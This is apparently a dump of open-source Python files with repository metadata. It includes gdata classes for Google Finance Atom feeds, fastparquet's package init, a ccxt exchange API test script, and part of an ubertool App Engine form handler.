#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains extensions to Atom objects used with Google Finance."""
from __future__ import unicode_literals
__author__ = '[email protected]'
import atom
import gdata
GD_NAMESPACE = 'http://schemas.google.com/g/2005'
GF_NAMESPACE = 'http://schemas.google.com/finance/2007'
class Money(atom.AtomBase):
    """The <gd:money> element.

    A monetary amount together with its currency code.
    """

    _tag = 'money'
    _namespace = GD_NAMESPACE
    # Map XML attribute names to Python attribute names.
    _attributes = atom.AtomBase._attributes.copy()
    _attributes['amount'] = 'amount'
    _attributes['currencyCode'] = 'currency_code'

    def __init__(self, amount=None, currency_code=None, **kwargs):
        self.amount = amount
        self.currency_code = currency_code
        atom.AtomBase.__init__(self, **kwargs)

    def __str__(self):
        # e.g. "100.0 USD"
        return "%s %s" % (self.amount, self.currency_code)


def MoneyFromString(xml_string):
    """Deserialize a <gd:money> element from an XML string."""
    return atom.CreateClassFromXMLString(Money, xml_string)
class _Monies(atom.AtomBase):
    """An element containing multiple <gd:money> in multiple currencies."""

    _namespace = GF_NAMESPACE
    _children = atom.AtomBase._children.copy()
    _children['{%s}money' % GD_NAMESPACE] = ('money', [Money])

    def __init__(self, money=None, **kwargs):
        # money: list of Money instances, one per currency.
        self.money = money or []
        atom.AtomBase.__init__(self, **kwargs)

    def __str__(self):
        return " / ".join(["%s" % i for i in self.money])


class CostBasis(_Monies):
    """The <gf:costBasis> element."""
    _tag = 'costBasis'


def CostBasisFromString(xml_string):
    """Deserialize a <gf:costBasis> element from an XML string."""
    return atom.CreateClassFromXMLString(CostBasis, xml_string)


class DaysGain(_Monies):
    """The <gf:daysGain> element."""
    _tag = 'daysGain'


def DaysGainFromString(xml_string):
    """Deserialize a <gf:daysGain> element from an XML string."""
    return atom.CreateClassFromXMLString(DaysGain, xml_string)


class Gain(_Monies):
    """The <gf:gain> element."""
    _tag = 'gain'


def GainFromString(xml_string):
    """Deserialize a <gf:gain> element from an XML string."""
    return atom.CreateClassFromXMLString(Gain, xml_string)


class MarketValue(_Monies):
    """The <gf:marketValue> element."""
    # Fix: the original assigned ``_tag = 'gain'`` immediately followed by
    # ``_tag = 'marketValue'`` (a copy/paste leftover); the dead first
    # assignment has been removed. The effective value is unchanged.
    _tag = 'marketValue'


def MarketValueFromString(xml_string):
    """Deserialize a <gf:marketValue> element from an XML string."""
    return atom.CreateClassFromXMLString(MarketValue, xml_string)


class Commission(_Monies):
    """The <gf:commission> element."""
    _tag = 'commission'


def CommissionFromString(xml_string):
    """Deserialize a <gf:commission> element from an XML string."""
    return atom.CreateClassFromXMLString(Commission, xml_string)


class Price(_Monies):
    """The <gf:price> element."""
    _tag = 'price'


def PriceFromString(xml_string):
    """Deserialize a <gf:price> element from an XML string."""
    return atom.CreateClassFromXMLString(Price, xml_string)
class Symbol(atom.AtomBase):
    """The <gf:symbol> element.

    Identifies a security by exchange, ticker symbol and full name.
    """

    _tag = 'symbol'
    _namespace = GF_NAMESPACE
    # Map XML attribute names to Python attribute names.
    _attributes = atom.AtomBase._attributes.copy()
    _attributes['fullName'] = 'full_name'
    _attributes['exchange'] = 'exchange'
    _attributes['symbol'] = 'symbol'

    def __init__(self, full_name=None, exchange=None, symbol=None, **kwargs):
        self.full_name = full_name
        self.exchange = exchange
        self.symbol = symbol
        atom.AtomBase.__init__(self, **kwargs)

    def __str__(self):
        # e.g. "NASDAQ:GOOG (Google Inc.)"
        return "%s:%s (%s)" % (self.exchange, self.symbol, self.full_name)


def SymbolFromString(xml_string):
    """Deserialize a <gf:symbol> element from an XML string."""
    return atom.CreateClassFromXMLString(Symbol, xml_string)


class TransactionData(atom.AtomBase):
    """The <gf:transactionData> element.

    Carries the details of a single transaction: its type (Buy, Sell,
    Sell Short, or Buy to Cover), date, number of units, notes, and the
    nested commission and price elements.
    """

    _tag = 'transactionData'
    _namespace = GF_NAMESPACE
    _attributes = atom.AtomBase._attributes.copy()
    _attributes['type'] = 'type'
    _attributes['date'] = 'date'
    _attributes['shares'] = 'shares'
    _attributes['notes'] = 'notes'
    # Nested <gf:commission> and <gf:price> child elements.
    _children = atom.AtomBase._children.copy()
    _children['{%s}commission' % GF_NAMESPACE] = ('commission', Commission)
    _children['{%s}price' % GF_NAMESPACE] = ('price', Price)

    def __init__(self, type=None, date=None, shares=None,
                 notes=None, commission=None, price=None, **kwargs):
        self.type = type
        self.date = date
        self.shares = shares
        self.notes = notes
        self.commission = commission
        self.price = price
        atom.AtomBase.__init__(self, **kwargs)


def TransactionDataFromString(xml_string):
    """Deserialize a <gf:transactionData> element from an XML string."""
    return atom.CreateClassFromXMLString(TransactionData, xml_string)


class TransactionEntry(gdata.GDataEntry):
    """An entry of the transaction feed.

    A TransactionEntry contains TransactionData such as the transaction
    type (Buy, Sell, Sell Short, or Buy to Cover), the number of units,
    the date, the price, any commission, and any notes.
    """

    _tag = 'entry'
    _namespace = atom.ATOM_NAMESPACE
    _children = gdata.GDataEntry._children.copy()
    _children['{%s}transactionData' % GF_NAMESPACE] = (
        'transaction_data', TransactionData)

    def __init__(self, transaction_data=None, **kwargs):
        self.transaction_data = transaction_data
        gdata.GDataEntry.__init__(self, **kwargs)

    def transaction_id(self):
        # The ID is the last path segment of the entry's Atom id URL.
        return self.id.text.split("/")[-1]

    transaction_id = property(transaction_id, doc='The transaction ID.')


def TransactionEntryFromString(xml_string):
    """Deserialize a transaction feed entry from an XML string."""
    return atom.CreateClassFromXMLString(TransactionEntry, xml_string)


class TransactionFeed(gdata.GDataFeed):
    """A feed that lists all of the transactions that have been recorded for
    a particular position.

    A transaction is a collection of information about an instance of
    buying or selling a particular security. The TransactionFeed lists all
    of the transactions that have been recorded for a particular position
    as a list of TransactionEntries.
    """

    _tag = 'feed'
    _namespace = atom.ATOM_NAMESPACE
    _children = gdata.GDataFeed._children.copy()
    _children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [TransactionEntry])


def TransactionFeedFromString(xml_string):
    """Deserialize a transaction feed from an XML string."""
    return atom.CreateClassFromXMLString(TransactionFeed, xml_string)


class TransactionFeedLink(atom.AtomBase):
    """Link to TransactionFeed embedded in PositionEntry.

    If a PositionFeed is queried with transactions='true', TransactionFeeds
    are inlined in the returned PositionEntries. These TransactionFeeds are
    accessible via TransactionFeedLink's feed attribute.
    """

    _tag = 'feedLink'
    _namespace = GD_NAMESPACE
    _attributes = atom.AtomBase._attributes.copy()
    _attributes['href'] = 'href'
    _children = atom.AtomBase._children.copy()
    _children['{%s}feed' % atom.ATOM_NAMESPACE] = (
        'feed', TransactionFeed)

    def __init__(self, href=None, feed=None, **kwargs):
        self.href = href
        self.feed = feed
        atom.AtomBase.__init__(self, **kwargs)
class PositionData(atom.AtomBase):
    """The <gf:positionData> element.

    Holds the per-position statistics: number of shares, gain
    percentage, returns over various horizons, and the nested
    costBasis/daysGain/gain/marketValue money elements.
    """

    _tag = 'positionData'
    _namespace = GF_NAMESPACE
    # Map XML attribute names to Python attribute names.
    _attributes = atom.AtomBase._attributes.copy()
    _attributes['gainPercentage'] = 'gain_percentage'
    _attributes['return1w'] = 'return1w'
    _attributes['return4w'] = 'return4w'
    _attributes['return3m'] = 'return3m'
    _attributes['returnYTD'] = 'returnYTD'
    _attributes['return1y'] = 'return1y'
    _attributes['return3y'] = 'return3y'
    _attributes['return5y'] = 'return5y'
    _attributes['returnOverall'] = 'return_overall'
    _attributes['shares'] = 'shares'
    # Nested money-valued child elements.
    _children = atom.AtomBase._children.copy()
    _children['{%s}costBasis' % GF_NAMESPACE] = ('cost_basis', CostBasis)
    _children['{%s}daysGain' % GF_NAMESPACE] = ('days_gain', DaysGain)
    _children['{%s}gain' % GF_NAMESPACE] = ('gain', Gain)
    _children['{%s}marketValue' % GF_NAMESPACE] = ('market_value', MarketValue)

    def __init__(self, gain_percentage=None,
                 return1w=None, return4w=None, return3m=None, returnYTD=None,
                 return1y=None, return3y=None, return5y=None, return_overall=None,
                 shares=None, cost_basis=None, days_gain=None,
                 gain=None, market_value=None, **kwargs):
        self.gain_percentage = gain_percentage
        self.return1w = return1w
        self.return4w = return4w
        self.return3m = return3m
        self.returnYTD = returnYTD
        self.return1y = return1y
        self.return3y = return3y
        self.return5y = return5y
        self.return_overall = return_overall
        self.shares = shares
        self.cost_basis = cost_basis
        self.days_gain = days_gain
        self.gain = gain
        self.market_value = market_value
        atom.AtomBase.__init__(self, **kwargs)


def PositionDataFromString(xml_string):
    """Deserialize a <gf:positionData> element from an XML string."""
    return atom.CreateClassFromXMLString(PositionData, xml_string)


class PositionEntry(gdata.GDataEntry):
    """An entry of the position feed.

    A PositionEntry contains the ticker exchange and Symbol for a stock,
    mutual fund, or other security, along with PositionData such as the
    number of units of that security that the user holds, and performance
    statistics.
    """

    _tag = 'entry'
    _namespace = atom.ATOM_NAMESPACE
    _children = gdata.GDataEntry._children.copy()
    _children['{%s}positionData' % GF_NAMESPACE] = (
        'position_data', PositionData)
    _children['{%s}symbol' % GF_NAMESPACE] = ('symbol', Symbol)
    _children['{%s}feedLink' % GD_NAMESPACE] = (
        'feed_link', TransactionFeedLink)

    def __init__(self, position_data=None, symbol=None, feed_link=None,
                 **kwargs):
        self.position_data = position_data
        self.symbol = symbol
        self.feed_link = feed_link
        gdata.GDataEntry.__init__(self, **kwargs)

    def position_title(self):
        return self.title.text

    position_title = property(position_title,
        doc='The position title as a string (i.e. position.title.text).')

    def ticker_id(self):
        # The ticker ID is the last path segment of the entry's Atom id URL.
        return self.id.text.split("/")[-1]

    ticker_id = property(ticker_id, doc='The position TICKER ID.')

    def transactions(self):
        # Inlined transactions are only present when the position feed was
        # queried with transactions='true'; otherwise feed_link.feed is None.
        if self.feed_link.feed:
            return self.feed_link.feed.entry
        else:
            return None

    transactions = property(transactions, doc="""
        Inlined TransactionEntries are returned if PositionFeed is queried
        with transactions='true'.""")


def PositionEntryFromString(xml_string):
    """Deserialize a position feed entry from an XML string."""
    return atom.CreateClassFromXMLString(PositionEntry, xml_string)


class PositionFeed(gdata.GDataFeed):
    """A feed that lists all of the positions in a particular portfolio.

    A position is a collection of information about a security that the
    user holds. The PositionFeed lists all of the positions in a particular
    portfolio as a list of PositionEntries.
    """

    _tag = 'feed'
    _namespace = atom.ATOM_NAMESPACE
    _children = gdata.GDataFeed._children.copy()
    _children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [PositionEntry])


def PositionFeedFromString(xml_string):
    """Deserialize a position feed from an XML string."""
    return atom.CreateClassFromXMLString(PositionFeed, xml_string)


class PositionFeedLink(atom.AtomBase):
    """Link to PositionFeed embedded in PortfolioEntry.

    If a PortfolioFeed is queried with positions='true', the PositionFeeds
    are inlined in the returned PortfolioEntries. These PositionFeeds are
    accessible via PositionFeedLink's feed attribute.
    """

    _tag = 'feedLink'
    _namespace = GD_NAMESPACE
    _attributes = atom.AtomBase._attributes.copy()
    _attributes['href'] = 'href'
    _children = atom.AtomBase._children.copy()
    _children['{%s}feed' % atom.ATOM_NAMESPACE] = (
        'feed', PositionFeed)

    def __init__(self, href=None, feed=None, **kwargs):
        self.href = href
        self.feed = feed
        atom.AtomBase.__init__(self, **kwargs)
class PortfolioData(atom.AtomBase):
  """The <gf:portfolioData> element.

  Carries per-portfolio statistics: currency, percentage returns over
  several trailing windows, and aggregate cost/gain/value child elements.
  """
  _tag = 'portfolioData'
  _namespace = GF_NAMESPACE
  # XML attribute name -> Python attribute name.
  _attributes = atom.AtomBase._attributes.copy()
  _attributes['currencyCode'] = 'currency_code'
  _attributes['gainPercentage'] = 'gain_percentage'
  _attributes['return1w'] = 'return1w'
  _attributes['return4w'] = 'return4w'
  _attributes['return3m'] = 'return3m'
  _attributes['returnYTD'] = 'returnYTD'
  _attributes['return1y'] = 'return1y'
  _attributes['return3y'] = 'return3y'
  _attributes['return5y'] = 'return5y'
  _attributes['returnOverall'] = 'return_overall'
  # Child elements parsed into typed objects.
  _children = atom.AtomBase._children.copy()
  _children['{%s}costBasis' % GF_NAMESPACE] = ('cost_basis', CostBasis)
  _children['{%s}daysGain' % GF_NAMESPACE] = ('days_gain', DaysGain)
  _children['{%s}gain' % GF_NAMESPACE] = ('gain', Gain)
  _children['{%s}marketValue' % GF_NAMESPACE] = ('market_value', MarketValue)

  def __init__(self, currency_code=None, gain_percentage=None,
               return1w=None, return4w=None, return3m=None, returnYTD=None,
               return1y=None, return3y=None, return5y=None, return_overall=None,
               cost_basis=None, days_gain=None, gain=None, market_value=None,
               **kwargs):
    """Constructs a portfolioData element.

    All statistics default to None; **kwargs is passed to atom.AtomBase.
    """
    self.currency_code = currency_code
    self.gain_percentage = gain_percentage
    self.return1w = return1w
    self.return4w = return4w
    self.return3m = return3m
    self.returnYTD = returnYTD
    self.return1y = return1y
    self.return3y = return3y
    self.return5y = return5y
    self.return_overall = return_overall
    self.cost_basis = cost_basis
    self.days_gain = days_gain
    self.gain = gain
    self.market_value = market_value
    atom.AtomBase.__init__(self, **kwargs)
def PortfolioDataFromString(xml_string):
  """Parses a PortfolioData element from its XML serialization."""
  return atom.CreateClassFromXMLString(PortfolioData, xml_string)
class PortfolioEntry(gdata.GDataEntry):
  """An entry of the PortfolioFeed.

  A PortfolioEntry contains the portfolio's title along with PortfolioData
  such as currency, total market value, and overall performance statistics.
  """
  _tag = 'entry'
  _namespace = atom.ATOM_NAMESPACE
  _children = gdata.GDataEntry._children.copy()
  _children['{%s}portfolioData' % GF_NAMESPACE] = (
      'portfolio_data', PortfolioData)
  _children['{%s}feedLink' % GD_NAMESPACE] = (
      'feed_link', PositionFeedLink)

  def __init__(self, portfolio_data=None, feed_link=None, **kwargs):
    """Constructs a portfolio entry.

    Args:
      portfolio_data: PortfolioData statistics for this portfolio, if any.
      feed_link: PositionFeedLink, possibly carrying an inlined PositionFeed.
      **kwargs: Remaining keyword arguments passed through to gdata.GDataEntry.
    """
    self.portfolio_data = portfolio_data
    self.feed_link = feed_link
    gdata.GDataEntry.__init__(self, **kwargs)

  def portfolio_title(self):
    return self.title.text

  def set_portfolio_title(self, portfolio_title):
    # Titles are stored as plain-text Atom <title> elements.
    self.title = atom.Title(text=portfolio_title, title_type='text')

  portfolio_title = property(portfolio_title, set_portfolio_title,
      doc='The portfolio title as a string (i.e. portfolio.title.text).')

  def portfolio_id(self):
    # The short id is the last path segment of the entry's Atom id URL.
    return self.id.text.split("/")[-1]

  portfolio_id = property(portfolio_id,
      doc='The portfolio ID. Do not confuse with portfolio.id.')

  def positions(self):
    # Only populated when the feed was fetched with positions='true'.
    if self.feed_link.feed:
      return self.feed_link.feed.entry
    else:
      return None

  positions = property(positions, doc="""
      Inlined PositionEntries are returned if PortfolioFeed was queried
      with positions='true'.""")
def PortfolioEntryFromString(xml_string):
  """Parses a PortfolioEntry from its XML serialization."""
  return atom.CreateClassFromXMLString(PortfolioEntry, xml_string)
class PortfolioFeed(gdata.GDataFeed):
  """A feed that lists all of the user's portfolios.

  A portfolio is a collection of positions that the user holds in various
  securities, plus metadata. The PortfolioFeed lists all of the user's
  portfolios as a list of PortfolioEntries.
  """
  _tag = 'feed'
  _namespace = atom.ATOM_NAMESPACE
  # Materialize <atom:entry> children as PortfolioEntry objects.
  _children = gdata.GDataFeed._children.copy()
  _children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry', [PortfolioEntry])
def PortfolioFeedFromString(xml_string):
  """Parses a PortfolioFeed from its XML serialization."""
  return atom.CreateClassFromXMLString(PortfolioFeed, xml_string)
| [
"[email protected]"
] | |
5bf6d8e5da9416d75daaa4e067ae7119ca58f647 | c2c6798ced0db33b2669f11f2434596c61496aef | /fastparquet/__init__.py | 38dec432f8c525661a842f3d0a7c473b1fa9f2e3 | [
"Apache-2.0"
] | permissive | PGryllos/fastparquet | e037b0d5e6387746f82e91fd9b4240962f178308 | 07401c501dbfc55c456052413f0c904483c68b50 | refs/heads/master | 2020-04-04T19:09:27.392744 | 2018-10-24T18:31:06 | 2018-10-24T18:31:06 | 156,194,372 | 0 | 0 | Apache-2.0 | 2018-11-05T09:46:52 | 2018-11-05T09:46:52 | null | UTF-8 | Python | false | false | 424 | py | """parquet - read parquet files."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from .thrift_structures import parquet_thrift
from .core import read_thrift
from .writer import write
from . import core, schema, converted_types, api
from .api import ParquetFile
from .util import ParquetException
__version__ = "0.1.6"
| [
"[email protected]"
] | |
36411eb463c030ab4360eebfa9af78fa62396e0f | 5e434bcedb9cfd14b26d7c8a2dc6ccdf132a8b83 | /test/test.py | 04a91fd7df5dae6a21c2e573a7b2a1b86f8f9d36 | [
"MIT"
] | permissive | mindw00rk/ccxt | 5884e73ac871e66bdfd0e86f6634e141b008b967 | b2f9ee175ea93d70b3699081fd84285f63254fec | refs/heads/master | 2021-07-08T20:12:30.199246 | 2017-09-28T06:58:45 | 2017-09-28T06:58:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,764 | py | # -*- coding: utf-8 -*-
import argparse
import os
import sys
import json
import time
from os import _exit
from traceback import format_tb
# ------------------------------------------------------------------------------
# Make the repository-root ccxt package importable when this script is run
# directly from the source tree (test/ lives one level below the package).
root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(root)

# ------------------------------------------------------------------------------

import ccxt  # noqa: E402
class Argv(object):
    """Bare attribute bag; argparse fills it in via parse_args(namespace=...)."""
# Parse the command line onto a plain namespace object shared by the module.
argv = Argv()

parser = argparse.ArgumentParser()
parser.add_argument('--verbose', action='store_true', help='enable verbose output')
parser.add_argument('--nonce', type=int, help='integer')
# Both positionals are optional: no exchange means "test everything".
parser.add_argument('exchange', type=str, help='exchange id in lowercase', nargs='?')
parser.add_argument('symbol', type=str, help='symbol in uppercase', nargs='?')
parser.parse_args(namespace=argv)

# Populated below: exchange id -> instantiated ccxt exchange object.
exchanges = {}
# ------------------------------------------------------------------------------
# string coloring functions
def style(s, style):
    # Coloring is deliberately disabled: the ANSI escape wrapping is commented
    # out, so every color helper below degrades to a plain str() conversion.
    return str(s)  # style + str (s) + '\033[0m'
# ANSI color/emphasis wrappers. All are currently no-ops because style()
# ignores the escape code (see above).
def green(s):
    return style(s, '\033[92m')


def blue(s):
    return style(s, '\033[94m')


def yellow(s):
    return style(s, '\033[93m')


def red(s):
    return style(s, '\033[91m')


def pink(s):
    return style(s, '\033[95m')


def bold(s):
    return style(s, '\033[1m')


def underline(s):
    return style(s, '\033[4m')
# Print a (potentially colored) string to stdout.
def dump(*args):
    """Print the space-joined string form of every argument on one line."""
    print(' '.join(map(str, args)))
# Print an error string to stderr.
def dump_error(*args):
    """Write the space-joined string form of the arguments to stderr."""
    text = ' '.join(map(str, args))
    sys.stderr.write(text + "\n")
# ------------------------------------------------------------------------------
def handle_all_unhandled_exceptions(type, value, traceback):
    """sys.excepthook replacement: dump the exception to stderr and abort.

    Args:
        type: exception class (shadows the builtin; kept for hook signature).
        value: exception instance.
        traceback: traceback object.
    """
    # Bug fix: the original concatenated the exception instance directly
    # ("' ' + value"), which raises TypeError for any non-str exception value
    # and masks the real error inside the excepthook itself.
    dump_error(yellow(str(type) + ' ' + str(value) + '\n\n' + '\n'.join(format_tb(traceback))))
    _exit(1)  # unrecoverable crash


sys.excepthook = handle_all_unhandled_exceptions
# ------------------------------------------------------------------------------
def test_order_book(exchange, symbol):
    """Fetch and print the top of the order book for symbol, if supported."""
    if exchange.hasFetchOrderBook:
        # Respect the exchange's rate limit (rateLimit is in milliseconds).
        delay = int(exchange.rateLimit / 1000)
        time.sleep(delay)
        dump(green(exchange.id), green(symbol), 'fetching order book...')
        orderbook = exchange.fetch_order_book(symbol)
        dump(
            green(exchange.id),
            green(symbol),
            'order book',
            orderbook['datetime'],
            'bid: ' + str(orderbook['bids'][0][0] if len(orderbook['bids']) else 'N/A'),
            'bidVolume: ' + str(orderbook['bids'][0][1] if len(orderbook['bids']) else 'N/A'),
            'ask: ' + str(orderbook['asks'][0][0] if len(orderbook['asks']) else 'N/A'),
            'askVolume: ' + str(orderbook['asks'][0][1] if len(orderbook['asks']) else 'N/A'))
    else:
        # Bug fix: this message previously read 'supported', the opposite of
        # what this branch means (compare the other test_* helpers).
        dump(yellow(exchange.id), 'fetch_order_book() not supported')
# ------------------------------------------------------------------------------
def test_ohlcv(exchange, symbol):
    """Fetch OHLCV candles for symbol and report how many were returned."""
    if exchange.hasFetchOHLCV:
        # Respect the exchange's rate limit (rateLimit is in milliseconds).
        delay = int(exchange.rateLimit / 1000)
        time.sleep(delay)
        ohlcvs = exchange.fetch_ohlcv(symbol)
        dump(green(exchange.id), 'fetched', green(len(ohlcvs)), 'OHLCVs')
    else:
        dump(yellow(exchange.id), 'fetch_ohlcv() not supported')
# ------------------------------------------------------------------------------
def test_tickers(exchange):
    """Fetch all tickers in a single call, if the exchange supports it."""
    if exchange.hasFetchTickers:
        # Respect the exchange's rate limit (rateLimit is in milliseconds).
        delay = int(exchange.rateLimit / 1000)
        time.sleep(delay)
        dump(green(exchange.id), 'fetching all tickers at once...')
        tickers = exchange.fetch_tickers()
        dump(green(exchange.id), 'fetched', green(len(list(tickers.keys()))), 'tickers')
    else:
        dump(yellow(exchange.id), 'fetch_tickers() not supported')
# ------------------------------------------------------------------------------
def test_ticker(exchange, symbol):
    """Fetch and print the current ticker snapshot for symbol."""
    if exchange.hasFetchTicker:
        # Respect the exchange's rate limit (rateLimit is in milliseconds).
        delay = int(exchange.rateLimit / 1000)
        time.sleep(delay)
        dump(green(exchange.id), green(symbol), 'fetching ticker...')
        ticker = exchange.fetch_ticker(symbol)
        dump(
            green(exchange.id),
            green(symbol),
            'ticker',
            ticker['datetime'],
            'high: ' + str(ticker['high']),
            'low: ' + str(ticker['low']),
            'bid: ' + str(ticker['bid']),
            'ask: ' + str(ticker['ask']),
            'volume: ' + str(ticker['quoteVolume']))
    else:
        dump(green(exchange.id), green(symbol), 'fetch_ticker() not supported')
# ------------------------------------------------------------------------------
def test_trades(exchange, symbol):
    """Fetch recent public trades for symbol and report the count."""
    if exchange.hasFetchTrades:
        # Respect the exchange's rate limit (rateLimit is in milliseconds).
        delay = int(exchange.rateLimit / 1000)
        time.sleep(delay)
        dump(green(exchange.id), green(symbol), 'fetching trades...')
        trades = exchange.fetch_trades(symbol)
        dump(green(exchange.id), green(symbol), 'fetched', green(len(list(trades))), 'trades')
    else:
        dump(green(exchange.id), green(symbol), 'fetch_trades() not supported')
# ------------------------------------------------------------------------------
def test_symbol(exchange, symbol):
    """Run all public-API checks for one trading symbol."""
    dump(green('SYMBOL: ' + symbol))
    test_ticker(exchange, symbol)
    # coinmarketcap is an aggregator, not a real exchange: it has no order
    # book or trade history, but exposes global market data instead.
    if exchange.id == 'coinmarketcap':
        dump(green(exchange.fetchGlobal()))
    else:
        test_order_book(exchange, symbol)
        test_trades(exchange, symbol)
    test_tickers(exchange)
    test_ohlcv(exchange, symbol)
# ------------------------------------------------------------------------------
def load_exchange(exchange):
    """Load the exchange's market metadata (required before any API test)."""
    exchange.load_markets()
def test_exchange(exchange):
    """Exercise the public API for one symbol, then the private API if keys are set."""
    dump(green('EXCHANGE: ' + exchange.id))
    # delay = 2
    keys = list(exchange.markets.keys())
    # ..........................................................................
    # public API
    # Prefer a well-known liquid pair when the exchange lists one; otherwise
    # fall back to the first market it offers.
    symbol = keys[0]
    symbols = [
        'BTC/USD',
        'BTC/CNY',
        'BTC/EUR',
        'BTC/ETH',
        'ETH/BTC',
        'BTC/JPY',
        'LTC/BTC',
        'USD/SLL',
    ]
    for s in symbols:
        if s in keys:
            symbol = s
            break
    # Skip darkpool-style markets (ids carrying a '.d' suffix).
    if symbol.find('.d') < 0:
        test_symbol(exchange, symbol)
    # ..........................................................................
    # private API
    # Without an API key only the public endpoints can be exercised.
    if (not hasattr(exchange, 'apiKey') or (len(exchange.apiKey) < 1)):
        return
    dump(green(exchange.id), 'fetching balance...')
    # balance = exchange.fetch_balance()
    exchange.fetch_balance()
    dump(green(exchange.id), 'fetched balance')
    if exchange.hasFetchOrders:
        try:
            dump(green(exchange.id), 'fetching orders...')
            orders = exchange.fetch_orders()
            dump(green(exchange.id), 'fetched', green(str(len(orders))), 'orders')
        except (ccxt.ExchangeError, ccxt.NotSupported) as e:
            dump_error(yellow('[' + type(e).__name__ + ']'), e.args)
        # except ccxt.NotSupported as e:
        #     dump(yellow(type(e).__name__), e.args)
    # Order-placement calls are intentionally left disabled below: enabling
    # them would place real trades on the configured account.
    # time.sleep(delay)
    # amount = 1
    # price = 0.0161
    # marketBuy = exchange.create_market_buy_order(symbol, amount)
    # print(marketBuy)
    # time.sleep(delay)
    # marketSell = exchange.create_market_sell_order(symbol, amount)
    # print(marketSell)
    # time.sleep(delay)
    # limitBuy = exchange.create_limit_buy_order(symbol, amount, price)
    # print(limitBuy)
    # time.sleep(delay)
    # limitSell = exchange.create_limit_sell_order(symbol, amount, price)
    # print(limitSell)
    # time.sleep(delay)
# ------------------------------------------------------------------------------
def try_all_proxies(exchange, proxies):
    """Run test_exchange, rotating through CORS proxies on transient failures."""
    current_proxy = 0
    max_retries = len(proxies)
    # Resume from the proxy the exchange is already configured with, if any.
    if exchange.proxy:
        current_proxy = proxies.index(exchange.proxy)
    for num_retries in range(0, max_retries):
        try:
            exchange.proxy = proxies[current_proxy]
            dump(green(exchange.id), 'using proxy', '`' + exchange.proxy + '`')
            current_proxy = (current_proxy + 1) % len(proxies)
            load_exchange(exchange)
            test_exchange(exchange)
            break  # success: no need to try the remaining proxies
        # Each failure class is logged to stderr and the next proxy is tried.
        except ccxt.RequestTimeout as e:
            dump_error(yellow('[' + type(e).__name__ + ']'), str(e))
        except ccxt.NotSupported as e:
            dump_error(yellow('[' + type(e).__name__ + ']'), e.args)
        except ccxt.DDoSProtection as e:
            dump_error(yellow('[' + type(e).__name__ + ']'), e.args)
        except ccxt.ExchangeNotAvailable as e:
            dump_error(yellow('[' + type(e).__name__ + ']'), e.args)
        except ccxt.AuthenticationError as e:
            dump_error(yellow('[' + type(e).__name__ + ']'), str(e))
        except ccxt.ExchangeError as e:
            dump_error(yellow('[' + type(e).__name__ + ']'), e.args)
# ------------------------------------------------------------------------------
# CORS proxies to rotate through when an exchange blocks direct requests;
# the empty string means "no proxy" and is tried first.
proxies = [
    '',
    'https://cors-anywhere.herokuapp.com/',
    'https://crossorigin.me/',
]

# prefer local testing keys to global keys
keys_global = './keys.json'
keys_local = './keys.local.json'
keys_file = keys_local if os.path.exists(keys_local) else keys_global

# load the api keys from config
with open(keys_file) as file:
    config = json.load(file)
# Instantiate every exchange ccxt knows about, honoring --verbose.
for id in ccxt.exchanges:
    exchange = getattr(ccxt, id)
    exchanges[id] = exchange({'verbose': argv.verbose})

# Apply API credentials and other per-exchange settings from the config,
# walking the entries in deterministic (sorted-by-id) order.
for (id, params) in list(ccxt.Exchange.keysort(config).items()):
    if id in exchanges:
        # Note: an unused `options = list(params.items())` local was removed.
        for key in params:
            setattr(exchanges[id], key, params[key])
# ------------------------------------------------------------------------------
def main():
    """Entry point: test one exchange/symbol from argv, or every exchange."""
    if argv.exchange:
        exchange = exchanges[argv.exchange]
        symbol = argv.symbol
        # Exchanges marked skip=True in the config are not tested.
        if hasattr(exchange, 'skip') and exchange.skip:
            dump(green(exchange.id), 'skipped')
        else:
            if symbol:
                load_exchange(exchange)
                test_symbol(exchange, symbol)
            else:
                try_all_proxies(exchange, proxies)
    else:
        # No exchange given on the command line: walk all of them.
        tuples = list(ccxt.Exchange.keysort(exchanges).items())
        for (id, params) in tuples:
            if id in exchanges:
                exchange = exchanges[id]
                if hasattr(exchange, 'skip') and exchange.skip:
                    dump(green(exchange.id), 'skipped')
                else:
                    try_all_proxies(exchange, proxies)

# ------------------------------------------------------------------------------

main()
| [
"[email protected]"
] | |
2f0a611da567bf2a6e1eedcb7042f1a475d9f211 | d89a482aaf3001bbc4515f39af9ba474e1ae6062 | /ubertool/exposure_output.py | 4a6a41f37b05e878207260f2803b50a2a59f17da | [] | no_license | hongtao510/u_tool | 2925e3694aba81714cf83018c3f8520a7b503228 | 98c962cfb1f53c4971fb2b9ae22c882c0fae6497 | refs/heads/master | 2021-01-10T20:40:24.793531 | 2014-03-14T22:57:37 | 2014-03-14T22:57:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,183 | py | import os
os.environ['DJANGO_SETTINGS_MODULE']='settings'
import webapp2 as webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
from google.appengine.api import users
from google.appengine.ext import db
import cgi
import cgitb
cgitb.enable()
import datetime
from ubertool.exposure import Exposure
import logging
class UbertoolExposureConfigurationPage(webapp.RequestHandler):
    """POST handler that saves an Exposure configuration for the signed-in user."""

    def post(self):
        logger = logging.getLogger("UbertoolExposureConfigurationPage")
        form = cgi.FieldStorage()
        config_name = str(form.getvalue('config_name'))
        user = users.get_current_user()
        # Reuse the user's existing configuration with this name, if any, so
        # repeated submissions update the record rather than duplicating it.
        q = db.Query(Exposure)
        q.filter('user =', user)
        q.filter("config_name =", config_name)
        exposure = q.get()
        if exposure is None:
            exposure = Exposure()
        if user:
            logger.info(user.user_id())
            exposure.user = user
        exposure.config_name = config_name
        exposure.cas_number = str(form.getvalue('cas_number'))
        exposure.formulated_product_name = form.getvalue('formulated_product_name')
        exposure.met_file = form.getvalue('metfile')
        exposure.przm_scenario = form.getvalue('PRZM_scenario')
        exposure.exams_environment_file = form.getvalue('EXAMS_environment_file')
        # NOTE(review): 'application_mathod' looks like a typo for
